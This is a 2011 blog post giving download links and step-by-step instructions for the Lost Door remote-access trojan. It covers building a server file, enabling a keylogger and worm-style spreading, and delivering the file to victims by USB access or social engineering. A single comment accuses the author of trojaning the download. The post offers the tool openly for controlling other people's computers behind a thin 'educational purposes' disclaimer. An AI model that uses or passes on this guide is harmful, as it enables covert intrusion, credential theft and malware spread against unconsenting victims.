Saturday, February 5, 2011

HACK A PC USING LOST DOOR

Lost Door RAT V 4.2.2 by OussamiO

Lost Door Version 4.2.2 is a Remote Administrator Trojan developed by OussamiO. This is the latest version. Use this to remote control others PC, please use this properly and hopefully you will not harm other PC’s with this tool. Use this for educational purposes only.

Change Logs

[+]Reformed Some windows
[+]IE8 Passwords added
[+]Upload Bugs Fixed
[+]No-Ip Server Crash Fixed
[+]Auto Refresh For options
[+]More Stable

Click to seee screenshot: http://photoserver.ws/images/mdm44b4497d3243c7.png

Download: http://www.4shared.com/file/95786510/b4361f6/Lost_Door_v31_Silver_Edition.html

or

http://www.4shared.com/file/MJis4tS2/Lost_door_V40_Pro.html (if it asks for password use: ehacking.nethungry-hacker.com)

On executing the download file, you will see the following screen. Accept it -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost.jpg

After it is open, right click on the window and click on create server -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost1.jpg

Now enter your IP address and DNS here. Leave the rest of the field as it is. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost2.jpg

Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost3.jpg

Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost4.jpg

Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim. -> http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost5.jpg

Sending the server file to your victim

This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.

* If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
* For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.

Using Spreading to affect multiple victims

If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.

NOT TESTED YET

1 comment:

  1. You put ur own server file in it ...and upload ....fuck you ...I will hack u ..this week ...and your dead server

    ReplyDelete